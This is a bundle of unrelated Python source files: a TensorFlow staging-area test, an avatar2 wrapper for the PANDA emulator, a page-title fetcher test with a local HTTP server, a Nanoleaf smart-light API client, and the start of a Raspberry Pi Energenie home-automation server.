# Stage key 1, x and f tuple entries
sess.run(stage_xf, feed_dict={pi: 1, x: 1, f: 2})
self.assertEqual(sess.run([size, isize]), [0, 2])
# Now complete key 0 with tuple entry v
sess.run(stage_v, feed_dict={pi: 0, v: 1})
# 1 complete and 1 incomplete entry
self.assertEqual(sess.run([size, isize]), [1, 1])
# We can now peek at 'x' and 'f' values associated with key 0
self.assertEqual(sess.run(peek_xf, feed_dict={pei: 0}), {'x': 1, 'f': 2})
# Peek at 'v' value associated with key 0
self.assertEqual(sess.run(peek_v, feed_dict={pei: 0}), {'v': 1})
# 1 complete and 1 incomplete entry
self.assertEqual(sess.run([size, isize]), [1, 1])
# We can now obtain 'x' and 'f' values associated with key 0
self.assertEqual(
sess.run([key_xf, get_xf], feed_dict={gi: 0}), [0, {
'x': 1,
'f': 2
}])
# Still have 1 complete and 1 incomplete entry
self.assertEqual(sess.run([size, isize]), [1, 1])
# We can no longer get 'x' and 'f' from key 0
with self.assertRaises(errors.InvalidArgumentError) as cm:
sess.run([key_xf, get_xf], feed_dict={gi: 0})
exc_str = ("Tensor at index '0' for key '0' " 'has already been removed.')
self.assertIn(exc_str, cm.exception.message)
# Obtain 'v' value associated with key 0
self.assertEqual(
sess.run([key_v, get_v], feed_dict={gi: 0}), [0, {
'v': 1
}])
# 0 complete and 1 incomplete entry
self.assertEqual(sess.run([size, isize]), [0, 1])
# Now complete key 1 with tuple entry v
sess.run(stage_v, feed_dict={pi: 1, v: 1})
      # 1 complete and 0 incomplete entries
self.assertEqual(sess.run([size, isize]), [1, 0])
# Pop without key to obtain 'x' and 'f' values associated with key 1
self.assertEqual(sess.run([pop_key_xf, pop_xf]), [1, {'x': 1, 'f': 2}])
      # Still 1 complete and 0 incomplete entries
self.assertEqual(sess.run([size, isize]), [1, 0])
      # We can now obtain the 'v' value associated with key 1
self.assertEqual(
sess.run([pop_key_v, pop_v], feed_dict={pi: 1}), [1, {
'v': 1
}])
# Nothing is left
self.assertEqual(sess.run([size, isize]), [0, 0])
@test_util.run_deprecated_v1
def testPartialIndexGets(self):
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
f = array_ops.placeholder(dtypes.float32)
v = array_ops.placeholder(dtypes.float32)
pi = array_ops.placeholder(dtypes.int64)
pei = array_ops.placeholder(dtypes.int64)
gi = array_ops.placeholder(dtypes.int64)
with ops.device(test.gpu_device_name()):
# Test again with partial index gets
stager = data_flow_ops.MapStagingArea(
[dtypes.float32, dtypes.float32, dtypes.float32])
stage_xvf = stager.put(pi, [x, v, f], [0, 1, 2])
key_xf, get_xf = stager.get(gi, [0, 2])
key_v, get_v = stager.get(gi, [1])
size = stager.size()
isize = stager.incomplete_size()
g.finalize()
with self.session(graph=g) as sess:
# Stage complete tuple
sess.run(stage_xvf, feed_dict={pi: 0, x: 1, f: 2, v: 3})
self.assertEqual(sess.run([size, isize]), [1, 0])
# Partial get using indices
self.assertEqual(
sess.run([key_xf, get_xf], feed_dict={gi: 0}), [0, [1, 2]])
# Still some of key 0 left
self.assertEqual(sess.run([size, isize]), [1, 0])
# Partial get of remaining index
self.assertEqual(sess.run([key_v, get_v], feed_dict={gi: 0}), [0, [3]])
# All gone
self.assertEqual(sess.run([size, isize]), [0, 0])
@test_util.run_deprecated_v1
def testNonScalarKeyOrderedMap(self):
with ops.Graph().as_default() as g:
x = array_ops.placeholder(dtypes.float32)
v = 2. * (array_ops.zeros([128, 128]) + x)
t = data_flow_ops.gen_data_flow_ops.ordered_map_stage(
key=constant_op.constant(value=[1], shape=(1, 3), dtype=dtypes.int64),
indices=np.array([[6]]),
values=[x, v],
dtypes=[dtypes.int64],
capacity=0,
memory_limit=0,
container='container1',
shared_name='',
name=None)
g.finalize()
with self.session(graph=g) as sess:
with self.assertRaisesRegex(errors.InvalidArgumentError,
'key must be an int64 scalar'):
sess.run(t, feed_dict={x: 1})
@test_util.run_deprecated_v1
def testNonScalarKeyUnorderedMap(self):
with ops.Graph().as_default() as g:
x = array_ops.placeholder(dtypes.float32)
v = 2. * (array_ops.zeros([128, 128]) + x)
t = data_flow_ops.gen_data_flow_ops.map_stage(
key=constant_op.constant(value=[1], shape=(1, 3), dtype=dtypes.int64),
indices=np.array([[6]]),
values=[x, v],
dtypes=[dtypes.int64],
capacity=0,
memory_limit=0,
container='container1',
shared_name='',
name=None)
g.finalize()
with self.session(graph=g) as sess:
with self.assertRaisesRegex(errors.InvalidArgumentError,
'key must be an int64 scalar'):
sess.run(t, feed_dict={x: 1})
if __name__ == '__main__':
test.main()
|
pypanda_target.py
|
from threading import Thread
from time import sleep
from avatar2.targets import PandaTarget
from ..watchmen import watch
from .target import action_valid_decorator_factory, TargetStates
class PyPandaTarget(PandaTarget):
'''
The pypanda target is a PANDA target, but uses pypanda to run the framework.
'''
def __init__(self, *args, **kwargs):
try:
import pandare
except ImportError:
raise RuntimeError(("PyPanda could not be found! for installation, "
"please follow the steps at https://github.com/"
"panda-re/panda/blob/master/panda/pypanda/docs/USAGE.md"))
super(PyPandaTarget, self).__init__(*args, **kwargs)
self.cb_ctx = 0
self.pypanda = None
self._thread = None
def shutdown(self):
if self._thread.is_alive():
self.protocols.execution.remote_disconnect()
self.pypanda.end_analysis()
# Wait for shutdown
while self._thread.is_alive():
sleep(.01)
@watch('TargetInit')
def init(self, **kwargs):
from pandare import Panda
arch = self.avatar.arch.qemu_name
args = self.assemble_cmd_line()[1:]
self.avatar.save_config(file_name=self.qemu_config_file,
config=self.generate_qemu_config())
self.pypanda = Panda(arch=arch, extra_args=args, **kwargs)
# adjust panda's signal handler to avatar2-standard
def SigHandler(SIG,a,b):
if self.state == TargetStates.RUNNING:
self.stop()
self.wait()
self.avatar.sigint_handler()
self.pypanda.setup_internal_signal_handler(signal_handler=SigHandler)
self._thread = Thread(target=self.pypanda.run, daemon=True)
self._thread.start()
self._connect_protocols()
def register_callback(self, callback, function, name=None, enabled=True,
procname=None):
pp = self.pypanda
        if not hasattr(pp.callback, callback):
raise Exception("Callback %s not found!" % callback)
cb = getattr(pp.callback, callback)
        if name is None:
name = 'avatar_cb_%d' % self.cb_ctx
self.cb_ctx += 1
pp.register_callback(cb, cb(function), name, enabled=enabled,
procname=procname)
return name
def disable_callback(self, name):
pp = self.pypanda
pp.disable_callback(name)
def enable_callback(self, name):
pp = self.pypanda
pp.enable_callback(name)
def add_hook(self, address, function, enabled=True,
kernel=True, asid=None, cb_type="before_block_exec"):
'''
        Registers a hook at the specified address with pypanda.
        :param address: Address to be hooked.
        :param function: Function to be executed at the specified address.
                         If the cb_type is "before_block_exec" (the default),
                         the arguments passed to that function are cdata
                         pointers to the following structs:
cpustate *, TranslationBlock *, hook *
'''
self.pypanda.hook(address, enabled=enabled, kernel=kernel, asid=asid,
cb_type=cb_type)(function)
@watch('TargetReadMemory')
@action_valid_decorator_factory(TargetStates.STOPPED, 'memory')
def read_memory(self, address, size, num_words=1, raw=False):
        if not raw:
return self.protocols.memory.read_memory(address, size, num_words)
else:
return self.pypanda.physical_memory_read(address,size*num_words)
@watch('TargetWriteMemory')
@action_valid_decorator_factory(TargetStates.STOPPED, 'memory')
def write_memory(self, address, size, value, num_words=1, raw=False):
        if not raw:
return self.protocols.memory.write_memory(address, size, value, num_words=num_words)
else:
return self.pypanda.physical_memory_write(address, value)
def delete_callback(self, name):
return self.pypanda.delete_callback(name)
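# --- Usage sketch (illustrative, not part of the original module) -------------
# Shows how the methods above combine once a PyPandaTarget has been created and
# initialised via avatar2 (that setup is assumed and not shown). The callback
# name 'asid_changed' is assumed to be one of pypanda's callback names.
def _example_usage(target):
    # `target` is assumed to be an initialised, stopped PyPandaTarget.
    def on_block(cpu, tb, hook):
        # Matches the before_block_exec signature described in add_hook's docstring.
        pass
    target.add_hook(0x8000, on_block)
    cb_name = target.register_callback('asid_changed', lambda *args: None)
    raw = target.read_memory(0x8000, 4, num_words=2, raw=True)
    target.disable_callback(cb_name)
    return raw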
|
test_titlegiver.py
|
# coding=utf-8
import threading
import urllib
import os
import json
import urllib.parse
import unittest
import http.server
from plugins.titlegiver.titlegiver import Titlegiver
__author__ = "tigge"
__author__ = "reggna"
class Handler(http.server.BaseHTTPRequestHandler):
def redirect(self):
count = int(self.url_queries["count"][0])
url = self.url_queries["url"][0]
if count > 1:
url = "redirect?count={0}&url={1}".format(
count - 1, self.url_queries["url"][0]
)
self.send_response(301)
self.send_header("Location", url)
self.end_headers()
self.wfile.write(
"<html><head><title>Redirect</title></head><body>See {0}</body></html>".format(
url
).encode(
"utf-8"
)
)
def page(self):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(
"<html><head><title>Simple</title></head><body>Simple</body></html>".encode(
"utf-8"
)
)
def pages(self):
self.send_response(200)
dir = os.path.join("..", os.path.dirname(__file__))
# Read headers from JSON dict, .headers extension
try:
with open(dir + "/" + urllib.parse.unquote(self.path) + ".header") as fp:
for header, value in json.load(fp).items():
self.send_header(header, value)
# Default headers, if not found
except IOError:
self.send_header("Content-Type", "text/html; charset=utf-8")
self.end_headers()
ip = "localhost:{}".format(self.server.server_port).encode("ascii")
with open(dir + "/" + urllib.parse.unquote(self.path), "br") as fp:
self.wfile.write(fp.read().replace("$ADDRESS".encode("ascii"), ip))
def do_GET(self):
self.url_parts = urllib.parse.urlparse(self.path)
self.url_queries = urllib.parse.parse_qs(self.url_parts.query)
if self.url_parts.path == "/redirect":
self.redirect()
elif self.url_parts.path == "/page":
self.page()
elif self.url_parts.path.startswith("/pages"):
self.pages()
def log_message(self, format, *args):
return
class TitlegiverTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.http_server = http.server.HTTPServer(("", 0), Handler)
cls.http_server_thread = threading.Thread(target=cls.http_server.serve_forever)
cls.http_server_thread.start()
cls.URL = "http://localhost:{}".format(cls.http_server.server_port)
@classmethod
def tearDownClass(cls):
cls.http_server.shutdown()
cls.http_server.server_close()
cls.http_server_thread.join()
def test_redirect(self):
url = self.URL + "/page"
result = Titlegiver.get_title_from_url(
self.URL + "/redirect?count=10&url={0}".format(url)
)
self.assertEqual(result, u"Simple")
def test_meta_redirect(self):
result = Titlegiver.get_title_from_url(self.URL + "/pages/meta_redirect")
self.assertEqual(result, u"Simple")
def test_meta_redirect_in_noscript(self):
result = Titlegiver.get_title_from_url(
self.URL + "/pages/meta_redirect_in_noscript"
)
self.assertEqual(result, u"Title without refreshing")
def test_specialchars(self):
result = Titlegiver.get_title_from_url(self.URL + "/pages/specialchar")
self.assertEqual(
result,
u"Title with special characters §½!\"@#£¤$%&/{([)]=}+?\`´'^~*'<>|,;.:-_",
)
def test_linebreaks(self):
result = Titlegiver.get_title_from_url(self.URL + "/pages/linebreaks")
self.assertEqual(result, u"Title with line breaks and carriage returns")
def test_attributes(self):
result = Titlegiver.get_title_from_url(self.URL + "/pages/attributes")
self.assertEqual(result, u'Title with attribute id="pageTitle"')
def test_entities(self):
result = Titlegiver.get_title_from_url(self.URL + "/pages/entities")
self.assertEqual(
result,
u"Title with entities. "
u'XML: "& '
u"HTML: <Å©†♥ "
u"Int/hex: Hello "
u"Invalid: #k;�&fail;",
)
def test_nonascii(self):
result = Titlegiver.get_title_from_url(self.URL + "/pages/nönàscii")
self.assertEqual(result, u"Page with nön-àscii path")
def test_encoding_bom(self):
result = Titlegiver.get_title_from_url(self.URL + "/pages/encoding_bom")
self.assertEqual(result, u"Gådzölla - ゴジラ")
def test_encoding_xmldecl(self):
result = Titlegiver.get_title_from_url(self.URL + "/pages/encoding_xmldecl")
self.assertEqual(result, u"Samoraj - 武家")
def test_encoding_meta_charset(self):
result = Titlegiver.get_title_from_url(
self.URL + "/pages/encoding_meta_charset"
)
self.assertEqual(result, u"Россия-Матушка")
def test_encoding_meta_httpequiv(self):
result = Titlegiver.get_title_from_url(
self.URL + "/pages/encoding_meta_httpequiv"
)
self.assertEqual(result, u"올드보이")
def test_split_strip_and_slice(self):
title = Titlegiver.get_title_from_url(self.URL + "/pages/linebreaks_with_cr")
result = Titlegiver.split_strip_and_slice(title, 2)
self.assertEqual(result, [u"Line1", "Line2"])
|
nanoleaf.py
|
"""nanoleafapi
This module is a Python 3 wrapper for the Nanoleaf OpenAPI.
It provides an easy way to use many of the functions available in the API.
It supports the Light Panels (previously Aurora), Canvas and Shapes (including Hexagons)."""
import json
from threading import Thread
import colorsys
import os
from typing import Any, List, Dict, Tuple, Union, Callable
from sseclient import SSEClient
import requests
# Preset colours
RED = (255, 0, 0)
ORANGE = (255, 165, 0)
YELLOW = (255, 255, 0)
GREEN = (0, 255, 0)
LIGHT_BLUE = (173, 216, 230)
BLUE = (0, 0, 255)
PINK = (255, 192, 203)
PURPLE = (128, 0, 128)
WHITE = (255, 255, 255)
class Nanoleaf():
"""The Nanoleaf class for controlling the Light Panels and Canvas
:ivar ip: IP of the Nanoleaf device
:ivar url: The base URL for requests
:ivar auth_token: The authentication token for the API
:ivar print_errors: True for errors to be shown, otherwise False
"""
def __init__(self, ip : str, auth_token : str =None, print_errors : bool =False):
"""Initalises Nanoleaf class with desired arguments.
:param ip: The IP address of the Nanoleaf device
:param auth_token: Optional, include Nanoleaf authentication
token here if required.
:param print_errors: Optional, True to show errors in the console
:type ip: str
:type auth_token: str
:type print_errors: bool
"""
self.ip = ip
self.print_errors = print_errors
self.url = "http://" + ip + ":16021/api/v1/" + str(auth_token)
self.check_connection()
if auth_token is None:
self.auth_token = self.create_auth_token()
if self.auth_token is None:
raise NanoleafRegistrationError()
else:
self.auth_token = auth_token
self.url = "http://" + ip + ":16021/api/v1/" + str(self.auth_token)
self.already_registered = False
def __error_check(self, code : int) -> bool:
"""Checks and displays error messages
Determines the request status code and prints the error, if print_errors
is true.
:param code: The error code
:returns: Returns True if request was successful, otherwise False
"""
if self.print_errors:
if code in (200, 204):
print(str(code) + ": Action performed successfully.")
return True
if code == 400:
print("Error 400: Bad request.")
elif code == 401:
print("Error 401: Unauthorized, invalid auth token. " +
"Please generate a new one.")
elif code == 403:
print("Error 403: Unauthorized, please hold the power " +
"button on the controller for 5-7 seconds, then try again.")
elif code == 404:
print("Error 404: Resource not found.")
elif code == 500:
print("Error 500: Internal server error.")
return False
return bool(code in (200, 204))
def create_auth_token(self) -> Union[str, None]:
"""Creates or retrives the device authentication token
The power button on the device should be held for 5-7 seconds, then
this method should be run. This will set both the auth_token and url
instance variables, and save the token in a file for future instances
of the Nanoleaf object.
:returns: Token if successful, None if not.
"""
file_path = os.path.expanduser('~') + os.path.sep + '.nanoleaf_token'
if os.path.exists(file_path) is False:
with open(file_path, 'w'):
pass
with open(file_path, 'r') as token_file:
tokens = token_file.readlines()
for token in tokens:
if token != "":
token = token.rstrip()
response = requests.get("http://" + self.ip + ":16021/api/v1/" + str(token))
if self.__error_check(response.status_code):
return token
response = requests.post('http://' + self.ip + ':16021/api/v1/new')
# process response
if response and response.status_code == 200:
data = json.loads(response.text)
if 'auth_token' in data:
                with open(file_path, 'a') as token_file:
                    token_file.write("\n" + data['auth_token'])
return data['auth_token']
return None
def delete_auth_token(self, auth_token : str) -> bool:
"""Deletes an authentication token
Deletes an authentication token and the .nanoleaf_token file if it
contains the auth token to delete. This token can no longer be used
as part of an API call to control the device. If required, generate
a new one using create_auth_token().
:param auth_token: The authentication token to delete.
:returns: True if successful, otherwise False
"""
url = "http://" + self.ip + ":16021/api/v1/" + str(auth_token)
response = requests.delete(url)
return self.__error_check(response.status_code)
def check_connection(self) -> None:
"""Ensures there is a valid connection"""
try:
requests.get(self.url, timeout=5)
except Exception as connection_error:
raise NanoleafConnectionError() from connection_error
def get_info(self) -> Dict[str, Any]:
"""Returns a dictionary of device information"""
response = requests.get(self.url)
return json.loads(response.text)
def get_name(self) -> str:
"""Returns the name of the current device"""
return self.get_info()['name']
def get_auth_token(self) -> str:
"""Returns the current auth token"""
return self.auth_token
def get_ids(self) -> List[int]:
"""Returns a list of all device ids"""
position_data = []
device_ids = []
info_data = self.get_info()
if ('panelLayout' in info_data and 'layout' in info_data['panelLayout'] and
'positionData' in info_data['panelLayout']['layout']):
position_data = info_data['panelLayout']['layout']['positionData']
# process position data
for data in position_data:
device_ids.append(data['panelId'])
return device_ids
@staticmethod
def get_custom_base_effect(anim_type : str ='custom', loop : bool =True) -> Dict[str, Any]:
"""Returns base custom effect dictionary"""
base_effect = {
'command': 'display',
'animType': anim_type,
'loop': loop,
'palette': []
}
return base_effect
#######################################################
#### POWER ####
#######################################################
def power_off(self) -> bool:
"""Powers off the lights
:returns: True if successful, otherwise False
"""
data = {"on" : {"value": False}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def power_on(self) -> bool:
"""Powers on the lights
:returns: True if successful, otherwise False
"""
data = {"on" : {"value": True}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def get_power(self) -> bool:
"""Returns the power status of the lights
:returns: True if on, False if off
"""
response = requests.get(self.url + "/state/on")
ans = json.loads(response.text)
return ans['value']
def toggle_power(self) -> bool:
"""Toggles the lights on/off"""
if self.get_power():
return self.power_off()
return self.power_on()
#######################################################
#### COLOUR ####
#######################################################
def set_color(self, r: int, g: int, b: int, br: int =-1) -> bool:
"""Sets the colour of the lights
:param rgb: Tuple in the format (r, g, b)
:returns: True if successful, otherwise False
"""
hsv_colour = colorsys.rgb_to_hsv(r/255, g/255, b/255)
hsv_colour_list = list(hsv_colour)
hsv_colour_list[0] *= 360
hsv_colour_list[1] *= 100
hsv_colour_list[2] *= 100
final_colour = [ int(x) for x in hsv_colour_list ]
if br == -1:
data = {
"hue" : {"value": final_colour[0]},
"sat": {"value": final_colour[1]},
"brightness": {"value": final_colour[2], "duration": 0}
}
else:
data = {
"hue" : {"value": final_colour[0]},
"sat": {"value": final_colour[1]},
"brightness": {"value": br, "duration": 0}
}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
#######################################################
#### ADJUST BRIGHTNESS ####
#######################################################
def set_brightness(self, brightness : int, duration : int =0) -> bool:
"""Sets the brightness of the lights
:param brightness: The required brightness (between 0 and 100)
:param duration: The duration over which to change the brightness
:returns: True if successful, otherwise False
"""
if brightness > 100 or brightness < 0:
raise ValueError('Brightness should be between 0 and 100')
data = {"brightness" : {"value": brightness, "duration": duration}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def increment_brightness(self, brightness : int) -> bool:
"""Increments the brightness of the lights
:param brightness: How much to increment the brightness, can
also be negative
:returns: True if successful, otherwise False
"""
data = {"brightness" : {"increment": brightness}}
response = requests.put(self.url + "/state", data = json.dumps(data))
return self.__error_check(response.status_code)
def get_brightness(self) -> int:
"""Returns the current brightness value of the lights"""
response = requests.get(self.url + "/state/brightness")
ans = json.loads(response.text)
return ans['value']
#######################################################
#### IDENTIFY ####
#######################################################
def identify(self) -> bool:
"""Runs the identify sequence on the lights
:returns: True if successful, otherwise False
"""
response = requests.put(self.url + "/identify")
return self.__error_check(response.status_code)
#######################################################
#### HUE ####
#######################################################
def set_hue(self, value : int) -> bool:
"""Sets the hue of the lights
:param value: The required hue (between 0 and 360)
:returns: True if successful, otherwise False
"""
if value > 360 or value < 0:
raise ValueError('Hue should be between 0 and 360')
data = {"hue" : {"value" : value}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def increment_hue(self, value : int) -> bool:
"""Increments the hue of the lights
:param value: How much to increment the hue, can also be negative
:returns: True if successful, otherwise False
"""
data = {"hue" : {"increment" : value}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def get_hue(self) -> int:
"""Returns the current hue value of the lights"""
response = requests.get(self.url + "/state/hue")
ans = json.loads(response.text)
return ans['value']
#######################################################
#### SATURATION ####
#######################################################
def set_saturation(self, value : int) -> bool:
"""Sets the saturation of the lights
:param value: The required saturation (between 0 and 100)
:returns: True if successful, otherwise False
"""
if value > 100 or value < 0:
raise ValueError('Saturation should be between 0 and 100')
data = {"sat" : {"value" : value}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def increment_saturation(self, value : int) -> bool:
"""Increments the saturation of the lights
        :param value: How much to increment the saturation, can also be
            negative.
:returns: True if successful, otherwise False
"""
data = {"sat" : {"increment" : value}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def get_saturation(self) -> int:
"""Returns the current saturation value of the lights"""
response = requests.get(self.url + "/state/sat")
ans = json.loads(response.text)
return ans['value']
#######################################################
#### COLOUR TEMPERATURE ####
#######################################################
def set_color_temp(self, value : int) -> bool:
"""Sets the white colour temperature of the lights
        :param value: The required colour temperature (between 1200 and 6500)
:returns: True if successful, otherwise False
"""
if value > 6500 or value < 1200:
raise ValueError('Colour temp should be between 1200 and 6500')
data = {"ct" : {"value" : value}}
response = requests.put(self.url + "/state", json.dumps(data))
return self.__error_check(response.status_code)
def increment_color_temp(self, value : int) -> bool:
"""Sets the white colour temperature of the lights
:param value: How much to increment the colour temperature by, can also
be negative.
:returns: True if successful, otherwise False
"""
data = {"ct" : {"increment" : value}}
response = requests.put(self.url + "/state", json.dumps(data))
return self.__error_check(response.status_code)
def get_color_temp(self) -> int:
"""Returns the current colour temperature of the lights"""
response = requests.get(self.url + "/state/ct")
ans = json.loads(response.text)
return ans['value']
#######################################################
#### COLOUR MODE ####
#######################################################
def get_color_mode(self) -> str:
"""Returns the colour mode of the lights"""
response = requests.get(self.url + "/state/colorMode")
return json.loads(response.text)
#######################################################
#### EFFECTS ####
#######################################################
def get_current_effect(self) -> str:
"""Returns the currently selected effect
If the name of the effect isn't available, this will return
*Solid*, *Dynamic* or *Static* instead.
:returns: Name of the effect or type if unavailable.
"""
response = requests.get(self.url + "/effects/select")
return json.loads(response.text)
def set_effect(self, effect_name : str) -> bool:
"""Sets the effect of the lights
:param effect_name: The name of the effect
:returns: True if successful, otherwise False
"""
data = {"select": effect_name}
response = requests.put(self.url + "/effects", data=json.dumps(data))
return self.__error_check(response.status_code)
def list_effects(self) -> List[str]:
"""Returns a list of available effects"""
response = requests.get(self.url + "/effects/effectsList")
return json.loads(response.text)
def write_effect(self, effect_dict : Dict['str', Any]) -> bool:
"""Writes a user-defined effect to the panels
:param effect_dict: The effect dictionary in the format
described here: https://forum.nanoleaf.me/docs/openapi#_u2t4jzmkp8nt
:raises NanoleafEffectCreationError: When invalid effect dictionary is provided.
:returns: True if successful, otherwise False
"""
response = requests.put(self.url + "/effects", data=json.dumps({"write": effect_dict}))
if response.status_code == 400:
raise NanoleafEffectCreationError("Invalid effect dictionary")
return self.__error_check(response.status_code)
def effect_exists(self, effect_name : str) -> bool:
"""Verifies whether an effect exists
:param effect_name: Name of the effect to verify
:returns: True if effect exists, otherwise False
"""
response = requests.get(self.url + "/effects/effectsList")
if effect_name in json.loads(response.text):
return True
return False
def pulsate(self, rgb : Tuple[int, int, int], speed : float = 1) -> bool:
"""Displays a pulsating effect on the device with two colours
:param rgb: A tuple containing the RGB colour to pulsate in the format (r, g, b).
:param speed: The speed of the transition between colours in seconds,
with a maximum of 1 decimal place.
:raises NanoleafEffectCreationError: When an invalid rgb value is provided.
:returns: True if the effect was created and displayed successfully, otherwise False
"""
if len(rgb) != 3:
raise NanoleafEffectCreationError("There must be three values in the " +
"RGB tuple! E.g., (255, 0, 0)")
for colour in rgb:
if not isinstance(colour, int):
raise NanoleafEffectCreationError("All values in the tuple must be " +
"integers! E.g., (255, 0, 0)")
if colour < 0 or colour > 255:
raise NanoleafEffectCreationError("All values in the tuple must be " +
"integers between 0 and 255! E.g., (255, 0, 0)")
base_effect = self.get_custom_base_effect()
ids = self.get_ids()
anim_data = str(len(ids))
frame_string = ""
for device_id in ids:
frame_string += " {id} 2".format(id=device_id)
r, g, b = rgb[0], rgb[1], rgb[2]
frame_string += " {r} {g} {b} 0 {speed} 0 0 0 0 {speed_2}".format(
r=r, g=g, b=b, speed=int(speed*10), speed_2=int(speed*10))
base_effect['animData'] = anim_data + frame_string
return self.write_effect(base_effect)
def flow(self, rgb_list : List[Tuple[int, int, int]], speed : float = 1) -> bool:
"""Displays a sequence of specified colours on the device.
        :param rgb_list: A list of tuples containing RGB colours to flow between in the format (r, g, b).
:param speed: The speed of the transition between colours in seconds, with a maximum of
1 decimal place.
:raises NanoleafEffectCreationError: When an invalid rgb_list is provided.
:returns: True if the effect was created and displayed successfully, otherwise False
"""
if len(rgb_list) <= 1:
raise NanoleafEffectCreationError("There has to be more than one tuple in " +
"the RGB list for this effect! E.g., [(255, 0, 0), (0, 0, 0)]")
for tup in rgb_list:
if len(tup) != 3:
raise NanoleafEffectCreationError("There must be three values in the " +
"RGB tuple! E.g., (255, 0, 0)")
for colour in tup:
if not isinstance(colour, int):
raise NanoleafEffectCreationError("All values in the tuple must " +
"be integers! E.g., (255, 0, 0)")
if colour < 0 or colour > 255:
raise NanoleafEffectCreationError("All values in the tuple must " +
"be integers between 0 and 255! E.g., (255, 0, 0)")
base_effect = self.get_custom_base_effect()
ids = self.get_ids()
anim_data = str(len(ids))
frame_string = ""
for device_id in ids:
frame_string += " {id} {numFrames}".format(id=device_id, numFrames=len(rgb_list))
for rgb in rgb_list:
r, g, b = rgb[0], rgb[1], rgb[2]
frame_string += " {r} {g} {b} 0 {speed}".format(r=r, g=g, b=b, speed=int(speed*10))
base_effect['animData'] = anim_data + frame_string
return self.write_effect(base_effect)
def spectrum(self, speed : float = 1) -> bool:
"""Displays a spectrum cycling effect on the device
:param speed: The speed of the transition between colours in seconds,
with a maximum of 1 decimal place.
:returns: True if the effect was created and displayed successfully,
otherwise False
"""
base_effect = self.get_custom_base_effect()
ids = self.get_ids()
spectrum_palette = []
for hue in range(0, 360, 10):
(r, g, b) = colorsys.hsv_to_rgb(hue/360, 1.0, 1.0)
spectrum_palette.append((int(255*r), int(255*g), int(255*b)))
anim_data = str(len(ids))
frame_string = ""
for device_id in ids:
frame_string += " {id} {numFrames}".format(id=device_id,
numFrames=len(spectrum_palette))
for rgb in spectrum_palette:
r, g, b = rgb[0], rgb[1], rgb[2]
frame_string += " {r} {g} {b} 0 {speed}".format(r=r, g=g, b=b, speed=int(speed*10))
base_effect['animData'] = anim_data + frame_string
return self.write_effect(base_effect)
#######################################################
#### LAYOUT ####
#######################################################
def get_layout(self) -> Dict[str, Any]:
"""Returns the device layout information"""
response = requests.get(self.url + "/panelLayout/layout")
return json.loads(response.text)
#######################################################
#### EVENTS ####
#######################################################
def register_event(self, func : Callable[[Dict[str, Any]], Any],
event_types : List[int]) -> None:
"""Starts a thread to register and listen for events
Creates an event listener. This method can only be called once per
program run due to API limitations.
        :param func: The function to run when an event is received (this
            should be defined by the user with one argument). This function
            will receive the event as a dictionary.
:param event_types: A list containing up to 4 numbers from
1-4 corresponding to the relevant events to be registered for.
1 = state (power/brightness),
2 = layout,
3 = effects,
4 = touch (Canvas only)
"""
if self.already_registered:
print("Cannot register events more than once.")
return
if len(event_types) > 4 or len(event_types) < 1:
raise Exception("The number of events to register for must be" +
"between 1-4")
for event in event_types:
if event < 1 or event > 4:
raise Exception("Valid event types must be between 1-4")
self.already_registered = True
thread = Thread(target=self.__event_listener, args=(func, set(event_types)))
thread.daemon = True
thread.start()
def __event_listener(self, func : Callable[[Dict[str, Any]], Any],
event_types : List[int]) -> None:
"""Listens for events and passes event data to the user-defined
function."""
url = self.url + "/events?id="
for event in event_types:
url += str(event) + ","
client = SSEClient(url[:-1])
for event in client:
func(json.loads(str(event)))
#######################################################
#### ERRORS ####
#######################################################
class NanoleafRegistrationError(Exception):
"""Raised when an issue during device registration."""
def __init__(self) -> None:
message = """Authentication token generation failed. Hold the power
button on your Nanoleaf device for 5-7 seconds and try again."""
super().__init__(message)
class NanoleafConnectionError(Exception):
"""Raised when the connection to the Nanoleaf device fails."""
def __init__(self) -> None:
message = "Connection to Nanoleaf device failed. Is this the correct IP?"
super().__init__(message)
class NanoleafEffectCreationError(Exception):
"""Raised when one of the custom effects creation has incorrect arguments."""
|
tab_pyenergenie_server2.py
|
#!/usr/bin/python
import time
import energenie
import sys
import os
import threading
import RPi.GPIO as GPIO
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from httplib2 import Http
import traceback
from energenie import OpenThings
from energenie import Devices
class PIRCallback:
def __init__(self,sensor):
self.sensor=sensor
def onMotion(self,sensor,on):
if on:
http_obj = Http( disable_ssl_certificate_validation=True )
resp, content = http_obj.request(
uri="https://192.168.1.1:8443/polestar/scripts/webhook/90697B320A017A92",
method='POST',
body=self.sensor
)
class Radiator:
def __init__(self,radiator,name):
self.radiator=radiator
self.name=name
def get_ambient_temperature(self):
t=self.radiator.get_ambient_temperature()
if t==None:
t=0.0
return t
def get_battery_voltage(self):
v=self.radiator.get_battery_voltage()
if v==None:
v=0.0
return v
def get_diagnostics(self):
d=self.radiator.get_diagnostics()
if d==None:
d=-1
return d
def toXMLString(self):
try:
now=time.time()
return "<{} temp='{:.2f}' voltage='{:.2f}' diag='{}' age='{:.0f}'/>".format(
self.name,
self.get_ambient_temperature(),
self.get_battery_voltage(),
self.get_diagnostics(),
now-self.radiator.lastHandledMessage,
)
except:
            traceback.print_exc()
return "<{}/>".format(self.name);
class EnergyMonitor:
def __init__(self,monitor,name,
dutyCycleThreshold=100,
averageSamples=360, # 60 mins
dutyCycleFilterFactor=0.5
):
self.name=name
self.dutyCycleThreshold=dutyCycleThreshold
self.powerReadingsSize=averageSamples
self.dutyCycleFilterFactor=dutyCycleFilterFactor
self.monitor=monitor
self.powerReadings = [-1 for i in range(0,self.powerReadingsSize)]
self.powerReadingsIndex=0
        self.avgPower=0.0
        self.dutyCycle=0.0
        self.dutyCycle2=-1
